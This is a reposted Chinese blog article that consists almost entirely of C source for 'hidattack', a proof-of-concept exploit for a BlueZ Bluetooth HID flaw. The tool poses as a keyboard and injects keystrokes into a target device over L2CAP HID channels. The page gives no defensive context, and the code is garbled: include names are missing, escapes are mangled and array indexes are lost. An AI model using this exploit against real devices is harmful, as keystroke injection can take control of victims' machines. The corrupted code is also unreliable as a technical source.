BlueZ HID不安全设备连接漏洞

2023-11-08 15:38

本文主要是介绍BlueZ HID不安全设备连接漏洞,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

BlueZ HID不安全设备连接漏洞

*
* hidattack v0.1
*
* (c) Collin R. Mulliner
* http://www.mulliner.org/bluetooth/
*
* License: GPLv2
*
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#include

#include
#include
#include
#include
#include
#include

#include "hid.h"
#include "sdp.h"

int cs;
int is;

/*
* taken from BlueZ
*/
static int l2cap_listen(const bdaddr_t *bdaddr, unsigned short psm, int lm, int backlog)
{
  struct sockaddr_l2 addr;
  struct l2cap_options opts;
  int sk;

  if ((sk = socket(PF_BLUETOOTH, SOCK_SEQPACKET, BTPROTO_L2CAP)) < 0)
    return -1;

  memset(&addr, 0, sizeof(addr));
  addr.l2_family = AF_BLUETOOTH;
  bacpy(&addr.l2_bdaddr, bdaddr);
  addr.l2_psm = htobs(psm);

  if (bind(sk, (struct sockaddr *) &addr, sizeof(addr)) < 0) {
    close(sk);
    return -1;
  }

  setsockopt(sk, SOL_L2CAP, L2CAP_LM, &lm, sizeof(lm));

  memset(&opts, 0, sizeof(opts));
  opts.imtu = HIDP_DEFAULT_MTU;
  opts.omtu = HIDP_DEFAULT_MTU;
  opts.flush_to = 0xffff;

  setsockopt(sk, SOL_L2CAP, L2CAP_OPTIONS, &opts, sizeof(opts));

  if (listen(sk, backlog) < 0) {
    close(sk);
    return -1;
  }

  return sk;
}

/*
* taken from BlueZ
*/
static int l2cap_connect(bdaddr_t *src, bdaddr_t *dst, unsigned short psm)
{
  struct sockaddr_l2 addr;
  struct l2cap_options opts;
  int sk;

  if ((sk = socket(PF_BLUETOOTH, SOCK_SEQPACKET, BTPROTO_L2CAP)) < 0)
    return -1;

  memset(&addr, 0, sizeof(addr));
  addr.l2_family = AF_BLUETOOTH;
  bacpy(&addr.l2_bdaddr, src);

  if (bind(sk, (struct sockaddr *) &addr, sizeof(addr)) < 0) {
    close(sk);
    return -1;
  }

  memset(&opts, 0, sizeof(opts));
  opts.imtu = HIDP_DEFAULT_MTU;
  opts.omtu = HIDP_DEFAULT_MTU;
  opts.flush_to = 0xffff;

  setsockopt(sk, SOL_L2CAP, L2CAP_OPTIONS, &opts, sizeof(opts));

  memset(&addr, 0, sizeof(addr));
  addr.l2_family = AF_BLUETOOTH;
  bacpy(&addr.l2_bdaddr, dst);
  addr.l2_psm = htobs(psm);

  if (connect(sk, (struct sockaddr *) &addr, sizeof(addr)) < 0) {
    close(sk);
    return -1;
  }

  return sk;
}

/*
* taken from BlueZ
*/
static int l2cap_accept(int sk, bdaddr_t *bdaddr)
{
  struct sockaddr_l2 addr;
  socklen_t addrlen;
  int nsk;

  memset(&addr, 0, sizeof(addr));
  addrlen = sizeof(addr);

  if ((nsk = accept(sk, (struct sockaddr *) &addr, &addrlen)) < 0)
    return -1;

  if (bdaddr)
    bacpy(bdaddr, &addr.l2_bdaddr);

  return nsk;
}

void usage()
{
  fprintf(stderr,  "/nhidattack v0.1 Dec. 2005 Collin R. Mulliner /n/n"/
                  "syntax: hidattack -hsce/n/n"/
                  "/th/t/thelp/n"/
                  "/ts/t/tserver mode/n"/
                  "/tc /tclient mode - connect to addr/n"/
                  "/te /tevent file/n");
}

int main(int argc, char **argv)
{
  unsigned char pkg[12];
  int ip;
  int i = 0;
  struct input_event ie;
  bdaddr_t dst;
  struct pollfd pf[3];
  unsigned char ib[1024];
  unsigned char cb[1024];
  int state = 0;
  unsigned char modifiers = 0;
  unsigned char modifiers_old = 0;
  int press = 0;
  int press_old = 0;
  int bitmask[8] = {0};
  int mode = -1;
  char event_file[256] = {0};
  int optid;


  while ((optid = getopt(argc, argv, "hsc:e:")) != -1) {
    switch (optid) {
    case &#39;s&#39;:
      mode = 0;
      break;
    case &#39;c&#39;:
      mode = 1;
      str2ba(optarg, &dst);
      break;
    case &#39;e&#39;:
      strcpy(event_file, optarg);
      break;
    default:
      usage();
      exit(0);
    }
  }

  if (sdp_open()) {
    sdp_add_keyboard();
  }
  else {
    fprintf(stderr, "can&#39;t connect to local SDP server/n");
    usage();
    exit(0);
  }
  
  if ((ip = open(event_file, O_RDONLY)) < 0) {
    perror("open event input");
    usage();
    exit(0);
  }

  printf("/nhidattack DEM0 (c) Collin R. Mulliner http://www.mulliner.org/bluetooth//n/n");
  
  if (mode == 0) {
    cs = l2cap_listen(BDADDR_ANY, L2CAP_PSM_HIDP_CTRL, 0, 1);
    is = l2cap_listen(BDADDR_ANY, L2CAP_PSM_HIDP_INTR, 0, 1);
    cs = l2cap_accept(cs, NULL);
    perror("HID control channel");
    is = l2cap_accept(is, NULL);
    perror("HID interupt channel");
  }
  else if (mode == 1) {
    cs = l2cap_connect(BDADDR_ANY, &dst, L2CAP_PSM_HIDP_CTRL);
    perror("HID control channel");
    is = l2cap_connect(BDADDR_ANY, &dst, L2CAP_PSM_HIDP_INTR);
    perror("HID interupt channel");
  }
  else {
    fprintf(stderr, "wrong mode/n");
    exit(-1);
  }

  pf[0].fd = ip;
  pf[0].events = POLLIN | POLLERR | POLLHUP;
  pf[1].fd = cs;
  pf[1].events = POLLIN | POLLERR | POLLHUP;
  pf[2].fd = is;
  pf[2].events = POLLIN | POLLERR | POLLHUP;
  
  while (1) {
    pf[0].revents = 0;
    pf[1].revents = 0;
    pf[2].revents = 0;
   
    if (poll(pf, 3, -1) <= 0) {
      continue;
    }
   
    bzero(pkg, 12);

    if (pf[0].revents) {
      if (state == 1) {
      if (read(ip, &ie, sizeof(ie)) <= 0) {
        perror("read ip");
        exit(-1);
      }
      if (ie.type == 0x01) {
        if (state == 1) {

          modifiers_old = modifiers;
          press_old = press;

          switch (ie.code) {
          case KEY_LEFTSHIFT:
            bitmask[1] = (ie.value ? 1 : 0);
            break;
          case KEY_RIGHTSHIFT:
            bitmask[5] = (ie.value ? 1 : 0);
            break;
          case KEY_LEFTALT:
            bitmask[2] = (ie.value ? 1 : 0);
            break;
          case KEY_RIGHTALT:
            bitmask[6] = (ie.value ? 1 : 0);
            break;
          case KEY_LEFTCTRL:
            bitmask[0] = (ie.value ? 1 : 0);
            break;
          case KEY_RIGHTCTRL:
            bitmask[4] = (ie.value ? 1 : 0);
            break;
          default:
            if (ie.value > 0) {
              pkg[4] = keycode2hidp[ie.code];
              //printf("keycode=%d, hidp=%d/n",ie.code,pkg[4]);
              press++;
            }
            else {
              press--;
            }
            break;
          }
         
          modifiers = 0;
          for (i = 0; i < 8; i++) {
            modifiers |= (bitmask << i);
          }
          //printf("modifiers: 0x%02x/n", modifiers);
         
          if (press != press_old || modifiers != modifiers_old) {
            pkg[0] = 0xa1;
            pkg[1] = 0x01;
            pkg[2] = modifiers;
            pkg[3] = 0x00;
            //pkg[4] = 0x00; // the key code
            pkg[5] = 0x00;
            pkg[6] = 0x00;
            pkg[7] = 0x00;
            pkg[8] = 0x00;
            pkg[9] = 0x00;
         
          if (write(is, pkg, 10) <= 0) {
              perror("write");
              exit(-1);
            }
          }
        }
      }
      }
    }
    if (pf[1].revents) {
      int size;
      int i;
      if ((size = read(cs, cb, sizeof(cb))) <= 0) {
        perror("read cs");
        exit(-1);
      }

      printf("cs(%d)/n", size);
      for (i = 0; i < size; i++)
        printf("%02x",cb);
      printf("/n");

      if (state == 0 && size == 1 && cb[0] == 0x70) {
        fprintf(stderr, "got set_protocol BOOT/n");
        pkg[0] = 0;
        write(cs, pkg, 1);
        state = 1;
      }
    }
    if (pf[2].revents) {
      int size;
      int i;
      if ((size = read(is, ib, sizeof(ib))) <= 0) {
        perror("read is");
        exit(-1);
      }
      printf("is(%d): ", size);
      for (i = 0; i < size; i++)
        printf("%02x",ib);
      printf("/n");
   
    }
  }
}

这篇关于BlueZ HID不安全设备连接漏洞的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/370839

相关文章

MySQL中的表连接原理分析

《MySQL中的表连接原理分析》:本文主要介绍MySQL中的表连接原理分析,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录1、背景2、环境3、表连接原理【1】驱动表和被驱动表【2】内连接【3】外连接【4编程】嵌套循环连接【5】join buffer4、总结1、背景

SpringBoot连接Redis集群教程

《SpringBoot连接Redis集群教程》:本文主要介绍SpringBoot连接Redis集群教程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录1. 依赖2. 修改配置文件3. 创建RedisClusterConfig4. 测试总结1. 依赖 <de

java连接opcua的常见问题及解决方法

《java连接opcua的常见问题及解决方法》本文将使用EclipseMilo作为示例库,演示如何在Java中使用匿名、用户名密码以及证书加密三种方式连接到OPCUA服务器,若需要使用其他SDK,原理... 目录一、前言二、准备工作三、匿名方式连接3.1 匿名方式简介3.2 示例代码四、用户名密码方式连接4

Python中文件读取操作漏洞深度解析与防护指南

《Python中文件读取操作漏洞深度解析与防护指南》在Web应用开发中,文件操作是最基础也最危险的功能之一,这篇文章将全面剖析Python环境中常见的文件读取漏洞类型,成因及防护方案,感兴趣的小伙伴可... 目录引言一、静态资源处理中的路径穿越漏洞1.1 典型漏洞场景1.2 os.path.join()的陷

MySQL 表的内外连接案例详解

《MySQL表的内外连接案例详解》本文给大家介绍MySQL表的内外连接,结合实例代码给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友参考下吧... 目录表的内外连接(重点)内连接外连接表的内外连接(重点)内连接内连接实际上就是利用where子句对两种表形成的笛卡儿积进行筛选,我

Apache 高级配置实战之从连接保持到日志分析的完整指南

《Apache高级配置实战之从连接保持到日志分析的完整指南》本文带你从连接保持优化开始,一路走到访问控制和日志管理,最后用AWStats来分析网站数据,对Apache配置日志分析相关知识感兴趣的朋友... 目录Apache 高级配置实战:从连接保持到日志分析的完整指南前言 一、Apache 连接保持 - 性

电脑蓝牙连不上怎么办? 5 招教你轻松修复Mac蓝牙连接问题的技巧

《电脑蓝牙连不上怎么办?5招教你轻松修复Mac蓝牙连接问题的技巧》蓝牙连接问题是一些Mac用户经常遇到的常见问题之一,在本文章中,我们将提供一些有用的提示和技巧,帮助您解决可能出现的蓝牙连接问... 蓝牙作为一种流行的无线技术,已经成为我们连接各种设备的重要工具。在 MAC 上,你可以根据自己的需求,轻松地

宝塔安装的MySQL无法连接的情况及解决方案

《宝塔安装的MySQL无法连接的情况及解决方案》宝塔面板是一款流行的服务器管理工具,其中集成的MySQL数据库有时会出现连接问题,本文详细介绍两种最常见的MySQL连接错误:“1130-Hostisn... 目录一、错误 1130:Host ‘xxx.xxx.xxx.xxx’ is not allowed

MySQL 多表连接操作方法(INNER JOIN、LEFT JOIN、RIGHT JOIN、FULL OUTER JOIN)

《MySQL多表连接操作方法(INNERJOIN、LEFTJOIN、RIGHTJOIN、FULLOUTERJOIN)》多表连接是一种将两个或多个表中的数据组合在一起的SQL操作,通过连接,... 目录一、 什么是多表连接?二、 mysql 支持的连接类型三、 多表连接的语法四、实战示例 数据准备五、连接的性

MySQL中的分组和多表连接详解

《MySQL中的分组和多表连接详解》:本文主要介绍MySQL中的分组和多表连接的相关操作,本文通过实例代码给大家介绍的非常详细,感兴趣的朋友一起看看吧... 目录mysql中的分组和多表连接一、MySQL的分组(group javascriptby )二、多表连接(表连接会产生大量的数据垃圾)MySQL中的